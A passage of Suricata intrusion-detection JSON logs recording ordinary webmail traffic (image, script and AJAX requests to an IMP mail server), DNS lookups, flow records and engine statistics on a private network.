Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} 
{"timestamp":"2020-02-29T00:23:14.059277+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":3}} {"timestamp":"2020-02-29T00:23:14.060224+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":10}} {"timestamp":"2020-02-29T00:23:14.061891+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:23:14.062479+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":11}} {"timestamp":"2020-02-29T00:23:14.063474+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":15}} 
{"timestamp":"2020-02-29T00:23:14.101269+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} {"timestamp":"2020-02-29T00:23:14.105302+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} {"timestamp":"2020-02-29T00:23:14.105284+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} 
{"timestamp":"2020-02-29T00:23:17.000362+0000","event_type":"stats","stats":{"uptime":15049,"capture":{"kernel_packets":140100,"kernel_drops":0},"decoder":{"pkts":140123,"bytes":96193959,"invalid":195,"ipv4":138552,"ipv6":10,"ethernet":140123,"raw":0,"null":0,"sll":0,"tcp":133002,"udp":5340,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2879,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2895,"synack":2886,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1896,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2443,"failed_udp":116},"tx":{"http":4909,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2525}},"flow_mgr":{"closed_pruned":2854,"new_pruned":17,"est_pruned":2504,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":6,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65529,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17848,"memcap_state":0,"memcap_global":0},"http":{"memuse":139487,"memcap":0}}} 
{"timestamp":"2020-02-29T00:23:18.000476+0000","flow_id":706061179386444,"event_type":"flow","src_ip":"192.168.10.122","src_port":55199,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:17.555596+0000","end":"2020-02-29T00:18:17.664296+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:18.576630+0000","flow_id":1779901807041841,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52976,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":0}} {"timestamp":"2020-02-29T00:23:19.062979+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":12}} 
{"timestamp":"2020-02-29T00:23:19.064032+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":4}} {"timestamp":"2020-02-29T00:23:19.066893+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":16}} 
{"timestamp":"2020-02-29T00:23:20.000471+0000","flow_id":65256369099473,"event_type":"flow","src_ip":"192.168.10.130","src_port":34270,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":33,"pkts_toclient":62,"bytes_toserver":3563,"bytes_toclient":80705,"start":"2020-02-29T00:22:11.398033+0000","end":"2020-02-29T00:22:16.434766+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:20.453231+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35494,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":21489,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:20.561932+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35494,"proto":"UDP","dns":{"type":"answer","id":21489,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:20.561932+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35494,"proto":"UDP","dns":{"type":"answer","id":21489,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:20.668550+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412}} {"timestamp":"2020-02-29T00:23:20.668550+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:23:23.000290+0000","flow_id":574334532723092,"event_type":"flow","src_ip":"192.168.10.122","src_port":36137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:22.074132+0000","end":"2020-02-29T00:18:22.182286+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:23.000546+0000","flow_id":773543705896811,"event_type":"flow","src_ip":"192.168.10.122","src_port":59659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:22.255851+0000","end":"2020-02-29T00:18:22.365114+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:23:24.000208+0000","event_type":"stats","stats":{"uptime":15056,"capture":{"kernel_packets":140139,"kernel_drops":0},"decoder":{"pkts":140146,"bytes":96197273,"invalid":195,"ipv4":138573,"ipv6":10,"ethernet":140146,"raw":0,"null":0,"sll":0,"tcp":133021,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2505,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":40078,"memcap":0}}} 
{"timestamp":"2020-02-29T00:23:25.669546+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52980,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":0}} {"timestamp":"2020-02-29T00:23:31.000213+0000","event_type":"stats","stats":{"uptime":15063,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":
116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} {"timestamp":"2020-02-29T00:23:38.000217+0000","event_type":"stats","stats":{"uptime":15070,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,
"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} {"timestamp":"2020-02-29T00:23:38.001500+0000","flow_id":1879111253891026,"event_type":"flow","src_ip":"192.168.10.81","src_port":52966,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":784,"bytes_toclient":908,"start":"2020-02-29T00:22:32.464850+0000","end":"2020-02-29T00:22:37.472548+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:38.001723+0000","flow_id":503789711071144,"event_type":"flow","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":61,"pkts_toclient":77,"bytes_toserver":10547,"bytes_toclient":94902,"start":"2020-02-29T00:22:29.464808+0000","end":"2020-02-29T00:22:37.767328+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:38.001819+0000","flow_id":1506488481224280,"event_type":"flow","src_ip":"192.168.10.81","src_port":52962,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":784,"bytes_toclient":910,"start":"2020-02-29T00:22:32.464472+0000","end":"2020-02-29T00:22:37.471831+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:38.001870+0000","flow_id":381567826925203,"event_type":"flow","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1360,"bytes_toclient":1913,"start":"2020-02-29T00:22:32.464531+0000","end":"2020-02-29T00:22:37.472507+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:39.000252+0000","flow_id":12900719167830,"event_type":"flow","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":37,"bytes_toserver":4664,"bytes_toclient":43270,"start":"2020-02-29T00:22:32.362838+0000","end":"2020-02-29T00:22:38.037589+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:39.000471+0000","flow_id":730770142977525,"event_type":"flow","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":53,"pkts_toclient":73,"bytes_toserver":6982,"bytes_toclient":92760,"start":"2020-02-29T00:22:32.318965+0000","end":"2020-02-29T00:22:38.042472+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:44.000688+0000","flow_id":110173123482339,"event_type":"flow","src_ip":"192.168.10.122","src_port":49631,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:43.889571+0000","end":"2020-02-29T00:18:43.998032+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:45.000149+0000","event_type":"stats","stats":{"uptime":15077,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2861,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked
":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16855,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:23:47.000853+0000","flow_id":1826094178214393,"event_type":"flow","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1070,"bytes_toclient":732,"start":"2020-02-29T00:22:41.369145+0000","end":"2020-02-29T00:22:46.542040+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 